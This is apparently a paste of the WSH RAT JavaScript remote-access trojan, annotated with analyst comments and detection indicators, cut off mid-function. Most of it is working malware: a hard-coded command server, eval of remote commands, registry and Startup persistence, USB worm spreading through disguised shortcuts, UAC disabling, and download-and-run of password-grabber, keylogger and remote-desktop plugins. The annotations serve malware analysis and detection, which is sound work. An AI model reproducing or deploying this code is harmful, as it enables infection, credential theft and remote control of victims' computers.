Racco42

wshrat

Apr 24th, 2019
  // writeBytes(file, bytes): saves a binary buffer to disk through an ADODB.Stream COM object.
  //   file  - destination path passed to SaveToFile.
  //   bytes - binary data handed to Stream.Write.
  // Type = 1 selects binary mode; the second SaveToFile argument (2) overwrites an existing file.
  // Every error is swallowed, so a failed write leaves no trace for the caller.
  // Analyst note: no call to this helper appears in this listing.
  1. function writeBytes(file, bytes) {
  2. try {
  3. var binaryStream = WScript.CreateObject("ADODB.Stream");
  4. binaryStream.Type = 1;
  5. binaryStream.Open();
  6. binaryStream.Write(bytes);
  7. binaryStream.SaveToFile(file, 2);
  8. } catch (err) {}
  9. }
  10.  
  // decodeBase64(base64): decodes a Base64 string by assigning it to a temporary
  // Microsoft.XMLDOM element whose dataType is "bin.base64" and returning nodeTypedValue.
  // Analyst note: no call to this helper appears in this listing. The XMLDOM "bin.base64"
  // pattern inside a WSH script is a common decoding idiom worth flagging in static triage.
  11. function decodeBase64(base64) {
  12. var DM = WScript.CreateObject("Microsoft.XMLDOM");
  13. var EL = DM.createElement("tmp");
  14. EL.dataType = "bin.base64";
  15. EL.text = base64;
  16. return EL.nodeTypedValue;
  17. }
  // Static configuration and shared COM objects used by every routine in this script.
  // Analyst notes (all values are taken from this listing):
  //   - The controller address is hard-coded: host 185.101.94.172, port 3018, reached over plain HTTP by post().
  //   - installdir is %temp% (expanded below, with a fallback to %temp% if the folder does not exist).
  //   - lnkfile / lnkfolder switch the shortcut creation performed by install() on removable drives.
  //   - installname is the script's own file name; it is reused as the Run value name and as the
  //     name of the HKLM\software\<name> key written by instance().
  //   - spliter "|" delimits fields in controller responses and in the User-Agent string.
  //   - sleep is the polling interval in milliseconds (5000 until changed by the "sleep" command).
  //   - instance() runs once before the polling loop starts.
  18. wshShell1 = null;
  19. var host = "185.101.94.172";
  20. var port = 3018;
  21. var installdir = "%temp%";
  22. var lnkfile = true;
  23. var lnkfolder = true;
  24. var shellobj = WScript.createObject("wscript.shell");
  25. var filesystemobj = WScript.createObject("scripting.filesystemobject");
  26. var httpobj = WScript.createObject("msxml2.xmlhttp");
  27. var installname = WScript.scriptName;
  28. var startup = shellobj.specialFolders("startup") + "\\";
  29. installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
  30. if (!filesystemobj.folderExists(installdir)) {
  31. installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";
  32. }
  33. var spliter = "|";
  34. var sleep = 5000;
  35. var response, cmd, param, oneonce;
  36. var inf = "";
  37. var usbspreading = "";
  38. var startdate = "";
  39. instance();
  // Polling loop. Each pass re-runs install(), sends an "is-ready" POST to the controller,
  // splits the reply on "|" and dispatches on the first field. Any exception is swallowed and
  // the loop sleeps for `sleep` milliseconds before the next poll.
  // Analyst notes:
  //   - Network: repeated HTTP POSTs from wscript.exe to http://<host>:<port>/is-ready at a fixed interval.
  //   - Process: wscript.exe spawning %comspec% (shutdown, taskkill, arbitrary commands) and
  //     downloaded executables named cmdc.exe, fm-plugin.exe, rd-plugin.exe, kl-plugin.exe.
  //   - File system: log retrieval commands read from <installdir>wshlogs\.
  //   - Because install() runs on every pass, persistence entries and removable-drive copies
  //     are re-created if they are removed while the script is still running; stop the process first.
  40. while (true) {
  41. try {
  42. install();
  43. response = "";
  44. response = post("is-ready", "");
  45. cmd = response.split(spliter);
  46. switch (cmd[0]) {
  47. case "disconnect":
  48. WScript.quit();
  49. break;
  50. case "reboot":
  51. shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
  52. break;
  53. case "shutdown":
  54. shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
  55. break;
  56. case "excecute":
  // The second field of the reply is passed to eval(): script text received over
  // unauthenticated HTTP runs inside the wscript.exe process.
  57. param = cmd[1];
  58. eval(param);
  59. break;
  60. case "get-pass":
  61. passgrabber(cmd[1], "cmdc.exe", cmd[2]);
  62. break;
  63. case "uninstall":
  64. uninstall();
  65. break;
  66. case "up-n-exec":
  67. download(cmd[1], cmd[2]);
  68. break;
  69. case "bring-log":
  70. upload(installdir + "wshlogs\\" + cmd[1], "take-log");
  71. break;
  72. case "down-n-exec":
  73. sitedownloader(cmd[1], cmd[2]);
  74. break;
  75. case "filemanager":
  76. servicestarter(cmd[1], "fm-plugin.exe", information());
  77. break;
  78. case "rdp":
  79. servicestarter(cmd[1], "rd-plugin.exe", information());
  80. break;
  81. case "keylogger":
  82. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);
  83. break;
  84. case "offline-keylogger":
  85. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);
  86. break;
  87. case "browse-logs":
  88. post("is-logs", enumfaf(installdir + "wshlogs"));
  89. break;
  90. case "cmd-shell":
  91. param = cmd[1];
  92. post("is-cmd-shell", cmdshell(param));
  93. break;
  94. case "get-processes":
  95. post("is-processes", enumprocess());
  96. break;
  97. case "disable-uac":
  // Only acts when the script was started with the /elevated named argument.
  // 0x80000002 is HKEY_LOCAL_MACHINE; EnableLUA and ConsentPromptBehaviorAdmin are both set to 0
  // through the WMI StdRegProv provider. Writes to these two values under
  // ...\Policies\System are a high-signal registry detection (ATT&CK T1112).
  98. if (WScript.Arguments.Named.Exists("elevated") == true) {
  99. var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
  100. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", 0);
  101. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "ConsentPromptBehaviorAdmin", 0);
  102. oReg = null;
  103. updatestatus("UAC+Disabled+(Reboot+Required)");
  104. }
  105. break;
  106. case "elevate":
  // Relaunches the script through Shell.Application.ShellExecute with the "runas" verb and a
  // /elevated argument, then quits. A wscript.exe command line containing "//B" and "/elevated"
  // is a usable process-creation indicator.
  107. if (WScript.Arguments.Named.Exists("elevated") == false) {
  108. try {
  109. oneonce.close();
  110. oneonce = null;
  111. WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
  112. updatestatus("Client+Elevated");
  113. } catch (nn) {}
  114. WScript.quit();
  115. } else {
  116. updatestatus("Client+Elevated");
  117. }
  118. break;
  119. case "if-elevate":
  120. if (WScript.Arguments.Named.Exists("elevated") == false) {
  121. updatestatus("Client+Not+Elevated");
  122. } else {
  123. updatestatus("Client+Elevated");
  124. }
  125. break;
  126. case "kill-process":
  127. exitprocess(cmd[1]);
  128. break;
  129. case "sleep":
  // The new polling interval is also obtained by eval() of controller-supplied text.
  130. param = cmd[1];
  131. sleep = eval(param);
  132. break;
  133. }
  134. } catch (er) {}
  135. WScript.sleep(sleep);
  136. }
  137.  
  // install(): refreshes persistence via upstart(), then processes every drive that is ready,
  // has free space and reports drivetype == 1 (removable in the FileSystemObject model).
  // On each such drive it:
  //   1. copies the running script to the drive root and sets its attributes to 2 + 4 (hidden + system);
  //   2. for every root file that is not a .lnk, sets hidden + system and creates "<basename>.lnk"
  //      whose target is cmd.exe with arguments "/c start <script>&start <original file>&exit";
  //   3. does the same for every root folder, using "start explorer <folder>" as the second command.
  // Shortcuts are created minimized (windowStyle = 7) and borrow the icon registered for the
  // original file type or for folders, so the root listing looks unchanged to the user.
  // All per-item errors are swallowed.
  // Analyst notes (ATT&CK T1091, replication through removable media):
  //   - .lnk files in a removable drive root whose target is cmd.exe and whose arguments contain "/c start " and "&exit";
  //   - original files and folders in the same root carrying hidden + system attributes;
  //   - a hidden + system script in the drive root with the same name as the copy in %temp%.
  138. function install() {
  139. var lnkobj;
  140. var filename;
  141. var foldername;
  142. var fileicon;
  143. var foldericon;
  144. upstart();
  145. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  146. var drive = dri.item();
  147. if (drive.isready == true) {
  148. if (drive.freespace > 0) {
  149. if (drive.drivetype == 1) {
  150. try {
  151. filesystemobj.copyFile(WScript.scriptFullName, drive.path + "\\" + installname, true);
  152. if (filesystemobj.fileExists(drive.path + "\\" + installname)) {
  153. filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2 + 4;
  154. }
  155. } catch (eiju) {}
  156. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  157. try {
  158. var file = fi.item();
  159. if (lnkfile == false) {
  160. break;
  161. }
  // indexOf(".") is used as a truth value: it is falsy only when the name starts with a dot.
  162. if (file.name.indexOf(".")) {
  163. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  164. file.attributes = 2 + 4;
  165. if (file.name.toUpperCase() != installname.toUpperCase()) {
  166. filename = file.name.split(".");
  167. lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
  168. lnkobj.windowStyle = 7;
  169. lnkobj.targetPath = "cmd.exe";
  170. lnkobj.workingDirectory = "";
  171. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +
  172. "&exit";
  // Icon lookup: reads the default icon registered under HKLM\software\classes for the file's extension.
  173. try {
  174. fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.s
  175. plit(".")[file.name.split(".").length - 1] + "\\") + "\\defaulticon\\");
  176. } catch (eeee) {}
  177. if (fileicon.indexOf(",") == 0) {
  178. lnkobj.iconLocation = file.path;
  179. } else {
  180. lnkobj.iconLocation = fileicon;
  181. }
  182. lnkobj.save();
  183. }
  184. }
  185. }
  186. } catch (err) {}
  187. }
  188. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  189. try {
  190. var folder = fi.item();
  191. if (lnkfolder == false) {
  192. break;
  193. }
  194. folder.attributes = 2 + 4;
  195. foldername = folder.name;
  196. lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
  197. lnkobj.windowStyle = 7;
  198. lnkobj.targetPath = "cmd.exe";
  199. lnkobj.workingDirectory = "";
  200. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") + "
  201. &exit";
  202. foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
  203. if (foldericon.indexOf(",") == 0) {
  204. lnkobj.iconLocation = folder.path;
  205. } else {
  206. lnkobj.iconLocation = foldericon;
  207. }
  208. lnkobj.save();
  209. } catch (err) {}
  210. }
  211. }
  212. }
  213. }
  214. }
  215. }
  216.  
  // uninstall(): the script's own removal routine, triggered by the "uninstall" command.
  // Steps visible here:
  //   1. deletes the Run values named after the script under HKCU and HKLM;
  //   2. deletes the Startup-folder copy and attempts to delete the running script;
  //   3. on removable drives (drivetype == 1): clears attributes on non-.lnk root files,
  //      deletes the matching "<basename>.lnk", deletes the script copy, deletes any other
  //      .lnk file in the root, and clears attributes on root folders;
  //   4. quits.
  // It does not touch the HKLM\software\<name> key written by instance(), the copy in
  // installdir, or the UAC values changed by "disable-uac".
  // NOTE(review): `wscript` is spelled in lower case in the second deleteFile call, unlike
  // `WScript` elsewhere; any resulting error is swallowed by the catch. Do not rely on this
  // routine for remediation - verify each artifact independently.
  217. function uninstall() {
  218. try {
  219. var filename;
  220. var foldername;
  221. try {
  222. shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  223. shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  224. } catch (ei) {}
  225. try {
  226. filesystemobj.deleteFile(startup + installname, true);
  227. filesystemobj.deleteFile(wscript.scriptfullname, true);
  228. } catch (eej) {}
  229. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  230. var drive = dri.item();
  231. if (drive.isready == true) {
  232. if (drive.freespace > 0) {
  233. if (drive.drivetype == 1) {
  234. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  235. var file = fi.item();
  236. try {
  237. if (file.name.indexOf(".")) {
  238. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  239. file.attributes = 0;
  240. if (file.name.toUpperCase() != installname.toUpperCase()) {
  241. filename = file.name.split(".");
  242. filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk");
  243. } else {
  244. filesystemobj.deleteFile(drive.path + "\\" + file.name);
  245. }
  246. } else {
  // Every .lnk in the drive root is deleted here, including shortcuts the user created.
  247. filesystemobj.deleteFile(file.path);
  248. }
  249. }
  250. } catch (ex) {}
  251. }
  252. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  253. var folder = fi.item();
  254. folder.attributes = 0;
  255. }
  256. }
  257. }
  258. }
  259. }
  260. } catch (err) {}
  261. WScript.quit();
  262. }
  263.  
  // post(cmd, param): synchronous HTTP POST to http://<host>:<port>/<cmd> using the shared
  // msxml2.xmlhttp object. `param` is sent as the request body and the response text is returned;
  // any error yields "".
  // Analyst notes:
  //   - Traffic is cleartext HTTP to a literal IP and port, with the command name as the URL path.
  //   - The header value is the pipe-delimited host profile built by information(), which begins
  //     with "WSHRAT|" - a usable proxy/IDS match on the User-Agent field.
  //   - The header name is passed with a trailing colon ("user-agent:").
  264. function post(cmd, param) {
  265. try {
  266. httpobj.open("post", "http://" + host + ":" + port + "/" + cmd, false);
  267. httpobj.setRequestHeader("user-agent:", information());
  268. httpobj.send(param);
  269. return httpobj.responseText;
  270. } catch (err) {
  271. return "";
  272. }
  273. }
  274.  
  // information(): builds, caches in the global `inf`, and returns the host profile string
  // sent as the User-Agent value on every request. Field order, joined with "|":
  //   WSHRAT | <hwid()> | %computername% | %username% | <OS caption from win32_operatingsystem>
  //          | plus | <security()> | <usbspreading> | JavaScript
  // Later calls return the cached value. Any error returns "".
  // Analyst note: the literal prefix "WSHRAT|" and suffix "|JavaScript" are stable strings for
  // network signatures; the remaining fields disclose host name, user name, OS and installed
  // antivirus product names to the controller.
  275. function information() {
  276. try {
  277. if (inf == "") {
  278. inf = hwid() + spliter;
  279. inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter;
  280. inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
  281. var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  282. var os = root.ExecQuery("select * from win32_operatingsystem");
  283. for (var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()) {
  284. var osinfo = fi.item();
  285. inf = inf + osinfo.caption + spliter;
  286. break;
  287. }
  288. inf = inf + "plus" + spliter;
  289. inf = inf + security() + spliter;
  290. inf = inf + usbspreading;
  291. inf = "WSHRAT" + spliter + inf + spliter + "JavaScript";
  292. return inf;
  293. } else {
  294. return inf;
  295. }
  296. } catch (err) {
  297. return "";
  298. }
  299. }
  300.  
  // upstart(): establishes persistence (ATT&CK T1547.001). It writes a Run value named after the
  // script (file name up to the first dot) under both HKCU and HKLM with the data
  //   wscript.exe //B "<installdir><installname>"
  // and copies the running script into installdir and into the user's Startup folder.
  // Registry errors are swallowed by the inner catch, so the file copies still happen when a
  // registry write fails. Called from instance() and again on every install() pass.
  // Analyst notes: look for Run values whose data starts with "wscript.exe //B" and points into
  // %temp%, and for script files in the Startup folder with the same name as a file in %temp%.
  301. function upstart() {
  302. try {
  303. try {
  304. shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"", "
  305. REG_SZ");
  306. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"",
  307. "REG_SZ");
  308. } catch (ei) {}
  309. filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
  310. filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
  311. } catch (err) {}
  312. }
  313.  
  // hwid(): returns the first non-empty volumeSerialNumber reported by win32_logicaldisk, which
  // the script uses as its host identifier (first field after "WSHRAT" in the User-Agent string).
  // Returns "" when the WMI query throws; falls off the end (undefined) when no disk qualifies.
  // The `break` after `return` is never reached.
  314. function hwid() {
  315. try {
  316. var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  317. var disks = root.ExecQuery("select * from win32_logicaldisk");
  318. for (var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()) {
  319. var disk = fi.item();
  320. if (disk.volumeSerialNumber != "") {
  321. return disk.volumeSerialNumber;
  322. break;
  323. }
  324. }
  325. } catch (err) {
  326. return "";
  327. }
  328. }
  329.  
  // security(): returns the display names of registered antivirus products, each followed by " .",
  // or "nan-av" when the query returns none. Returns undefined when anything throws.
  // How it works, as written:
  //   - reads the OS version string from win32_operatingsystem and splits it on ".";
  //   - builds a numeric string from the first component (the loop appends versionstr[0] on every
  //     pass) and converts it with eval();
  //   - queries root\securitycenter2 when that number is greater than 6, otherwise root\securitycenter;
  //   - enumerates "select * from antivirusproduct".
  // Analyst note: a WSH script querying the SecurityCenter namespaces for antivirusproduct is
  // security-product discovery; the result is sent to the controller inside the User-Agent string.
  330. function security() {
  331. try {
  332. var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  333. var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem", null, 48);
  334. var versionstr, osversion;
  335. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  336. var objitem = fi.item();
  337. versionstr = objitem.version.toString().split(".");
  338. }
  339. osversion = versionstr[0] + ".";
  340. for (var x = 1; x < versionstr.length; x++) {
  341. osversion = osversion + versionstr[0];
  342. }
  // eval() here operates on a string derived from the local WMI version value, not on controller input.
  343. osversion = eval(osversion);
  344. var sc;
  345. if (osversion > 6) {
  346. sc = "securitycenter2";
  347. } else {
  348. sc = "securitycenter";
  349. }
  350. var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
  351. var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
  352. var secu = "";
  353. for (var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()) {
  354. var objantivirus = fi.item();
  355. secu = secu + objantivirus.displayName + " .";
  356. }
  357. if (secu == "") {
  358. secu = "nan-av";
  359. }
  360. return secu;
  361. } catch (err) {}
  362. }
  363.  
  // getDate(): returns the current local date as "<day>/<month>/<year>" without zero padding.
  // The year component comes from Date.getYear(). The result is stored in the
  // HKLM\software\<name> value written by instance(), so it approximates the first-run date.
  364. function getDate() {
  365. var s = "";
  366. var d = new Date();
  367. s += d.getDate() + "/";
  368. s += (d.getMonth() + 1) + "/";
  369. s += d.getYear();
  370. return s;
  371. }
  372.  
  // instance(): start-up routine, called once before the polling loop.
  //   1. Reads the default value of HKLM\software\<script base name>\ into `usbspreading`.
  //   2. If empty, records how this host was first reached: "true - <date>" when the script is
  //      running from a drive root (path after the drive letter equals ":\<installname>"),
  //      otherwise "false - <date>", and writes that string back to the same registry value.
  //   3. Calls upstart() to create the persistence entries and file copies.
  //   4. If the running script is not the copy in installdir (short paths differ), launches that
  //      copy with "wscript.exe //B" and quits.
  //   5. Opens the installed copy for appending (mode 8) and keeps the handle in `oneonce`.
  //      `oneonce` is declared with `var` inside this function, so it is a local distinct from
  //      the top-level variable of the same name.
  // Any error quits the script.
  // Analyst notes: the HKLM\software\<script base name> key with a default value of the form
  // "true - d/m/yyyy" or "false - d/m/yyyy" is a host indicator and records whether the initial
  // execution came from a removable-drive root; the uninstall() routine does not remove it.
  373. function instance() {
  374. try {
  375. try {
  376. usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
  377. } catch (eee) {}
  378. if (usbspreading == "") {
  379. if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()) {
  380. usbspreading = "true - " + getDate();
  381. try {
  382. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  383. } catch (eeeee) {}
  384. } else {
  385. usbspreading = "false - " + getDate();
  386. try {
  387. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  388. } catch (eeeee) {}
  389. }
  390. }
  391. upstart();
  392. var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
  393. var installfullnameshort = filesystemobj.getFile(installdir + installname);
  394. if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()) {
  395. shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
  396. WScript.quit();
  397. }
  398. var oneonce = filesystemobj.openTextFile(installdir + installname, 8, false);
  399. } catch (err) {
  400. WScript.quit();
  401. }
  402. }
  403.  
  // passgrabber(fileurl, filename, retcmd): handler for the "get-pass" command (filename is
  // "cmdc.exe" at the only call site in this listing).
  //   fileurl  - URL the executable is fetched from with a synchronous GET.
  //   filename - name the executable is saved under in installdir.
  //   retcmd   - URL path used when the output file is posted back to the controller.
  // Sequence: force-kill any running <filename>; delete a previous "<filename>data" file; write a
  // "<basename>.cfg" file next to the executable; download and save the executable; run it with
  // " /stext <path>data"; wait 2 seconds; delete the executable; upload "<path>data" via upload().
  // NOTE(review): the tool itself is not part of this listing; the .cfg layout and the /stext
  // switch suggest a third-party credential-export utility - confirm from the downloaded sample.
  // Analyst notes: cmdc.exe, cmdc.cfg and cmdc.exedata appearing briefly in %temp%, taskkill
  // launched by wscript.exe, and an HTTP POST whose body is the exported text file.
  404. function passgrabber(fileurl, filename, retcmd) {
  405. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  406. try {
  407. filesystemobj.deleteFile(installdir + filename + "data");
  408. } catch (ey) {}
  409. var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
  410. var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF
  411. FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA
  412. 00 08 00\nSort=0";
  413. var writer = filesystemobj.openTextFile(config_file, 2, true);
  414. writer.writeLine(cfg);
  415. writer.close();
  416. writer = null;
  417. var strlink = fileurl;
  418. var strsaveto = installdir + filename;
  419. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  420. objhttpdownload.open("get", strlink, false);
  421. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  422. objhttpdownload.send();
  423. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  424. if (objfsodownload.fileExists(strsaveto)) {
  425. objfsodownload.deleteFile(strsaveto);
  426. }
  427. if (objhttpdownload.status == 200) {
  428. var objstreamdownload = WScript.CreateObject("adodb.stream");
  429. objstreamdownload.Type = 1;
  430. objstreamdownload.Open();
  431. objstreamdownload.Write(objhttpdownload.responseBody);
  432. objstreamdownload.SaveToFile(strsaveto);
  433. objstreamdownload.close();
  434. objstreamdownload = null;
  435. }
  436. if (objfsodownload.fileExists(strsaveto)) {
  437. var runner = WScript.CreateObject("Shell.Application");
  438. var saver = objfsodownload.getFile(strsaveto).shortPath
  439. runner.shellExecute(saver, " /stext " + saver + "data");
  440. WScript.sleep(2000);
  441. deletefaf(strsaveto);
  442. upload(saver + "data", retcmd);
  443. }
  444. }
  445.  
  // keyloggerstarter(fileurl, filename, filearg, is_offline): handler for the "keylogger" and
  // "offline-keylogger" commands (filename is "kl-plugin.exe" at both call sites).
  //   fileurl    - URL the plugin executable is fetched from with a synchronous GET.
  //   filename   - name the plugin is saved under in installdir.
  //   filearg    - host profile string from information(), passed to the plugin in quotes.
  //   is_offline - 0 or 1, appended as the last command-line argument.
  // Sequence: force-kill any running <filename>; download; replace the file in installdir when
  // the response status is 200; run it as  "<path>" <host> <port> "<filearg>" <is_offline>.
  // No integrity or origin check is applied to the downloaded file.
  // Analyst note: kl-plugin.exe in %temp% started by wscript.exe with the controller IP and port
  // on its command line is a strong process-creation indicator.
  446. function keyloggerstarter(fileurl, filename, filearg, is_offline) {
  447. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  448. var strlink = fileurl;
  449. var strsaveto = installdir + filename;
  450. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  451. objhttpdownload.open("get", strlink, false);
  452. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  453. objhttpdownload.send();
  454. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  455. if (objfsodownload.fileExists(strsaveto)) {
  456. objfsodownload.deleteFile(strsaveto);
  457. }
  458. if (objhttpdownload.status == 200) {
  459. var objstreamdownload = WScript.CreateObject("adodb.stream");
  460. objstreamdownload.Type = 1;
  461. objstreamdownload.Open();
  462. objstreamdownload.Write(objhttpdownload.responseBody);
  463. objstreamdownload.SaveToFile(strsaveto);
  464. objstreamdownload.close();
  465. objstreamdownload = null;
  466. }
  467. if (objfsodownload.fileExists(strsaveto)) {
  468. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);
  469. }
  470. }
  471.  
  // servicestarter(fileurl, filename, filearg): handler for the "filemanager" and "rdp" commands
  // (filename is "fm-plugin.exe" or "rd-plugin.exe" at the call sites in this listing).
  //   fileurl  - URL the plugin executable is fetched from with a synchronous GET.
  //   filename - name the plugin is saved under in installdir.
  //   filearg  - host profile string from information(), passed to the plugin in quotes.
  // Sequence: force-kill any running <filename>; download; replace the file in installdir when
  // the response status is 200; run it as  "<path>" <host> <port> "<filearg>".
  // Same flow as keyloggerstarter() without the trailing mode argument.
  // Analyst note: fm-plugin.exe / rd-plugin.exe in %temp% launched by wscript.exe with the
  // controller IP and port as arguments.
  472. function servicestarter(fileurl, filename, filearg) {
  473. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  474. var strlink = fileurl;
  475. var strsaveto = installdir + filename;
  476. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  477. objhttpdownload.open("get", strlink, false);
  478. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  479. objhttpdownload.send();
  480. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  481. if (objfsodownload.fileExists(strsaveto)) {
  482. objfsodownload.deleteFile(strsaveto);
  483. }
  484. if (objhttpdownload.status == 200) {
  485. var objstreamdownload = WScript.CreateObject("adodb.stream");
  486. objstreamdownload.Type = 1;
  487. objstreamdownload.Open();
  488. objstreamdownload.Write(objhttpdownload.responseBody);
  489. objstreamdownload.SaveToFile(strsaveto);
  490. objstreamdownload.close();
  491. objstreamdownload = null;
  492. }
  493. if (objfsodownload.fileExists(strsaveto)) {
  494. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\"");
  495. }
  496. }
  497.  
  // sitedownloader(fileurl, filename): handler for the "down-n-exec" command.
  //   fileurl  - URL supplied by the controller; fetched with a synchronous GET.
  //   filename - name the file is saved under in installdir.
  // Unlike the other download routines this one uses msxml2.serverxmlhttp and a header name
  // without a trailing colon. When the status is 200 the body replaces <installdir><filename>;
  // if the file then exists it is run by its short (8.3) path and "Executed+File" is reported
  // through updatestatus(). No integrity or origin check is applied.
  // Analyst note: outbound GET from wscript.exe to a URL outside the controller address, followed
  // by execution of a new file from %temp%, then a POST to /update-status|Executed+File.
  498. function sitedownloader(fileurl, filename) {
  499. var strlink = fileurl;
  500. var strsaveto = installdir + filename;
  501. var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
  502. objhttpdownload.open("get", strlink, false);
  503. objhttpdownload.setRequestHeader("cache-control", "max-age=0");
  504. objhttpdownload.send();
  505. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  506. if (objfsodownload.fileExists(strsaveto)) {
  507. objfsodownload.deleteFile(strsaveto);
  508. }
  509. if (objhttpdownload.status == 200) {
  510. var objstreamdownload = WScript.CreateObject("adodb.stream");
  511. objstreamdownload.Type = 1;
  512. objstreamdownload.Open();
  513. objstreamdownload.Write(objhttpdownload.responseBody);
  514. objstreamdownload.SaveToFile(strsaveto);
  515. objstreamdownload.close();
  516. objstreamdownload = null;
  517. }
  518. if (objfsodownload.fileExists(strsaveto)) {
  519. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  520. updatestatus("Executed+File");
  521. }
  522. }
  523.  
  // download(fileurl, filedir): handler for the "up-n-exec" command; the file comes from the
  // controller itself rather than from a third-party URL.
  //   fileurl - path on the controller side; its last "\"-separated component becomes the local file name.
  //   filedir - destination directory; installdir is used when it is "".
  // It POSTs to http://<host>:<port>/send-to-me|<fileurl>, saves the response body when the
  // status is 200, runs the saved file by its short path and reports "Executed+File".
  // `strsaveto` is assigned without `var`, so it becomes a script-wide variable.
  // Analyst note: the URL path "send-to-me|" followed by a Windows-style path is a stable
  // network indicator for this command.
  524. function download(fileurl, filedir) {
  525. if (filedir == "") {
  526. filedir = installdir;
  527. }
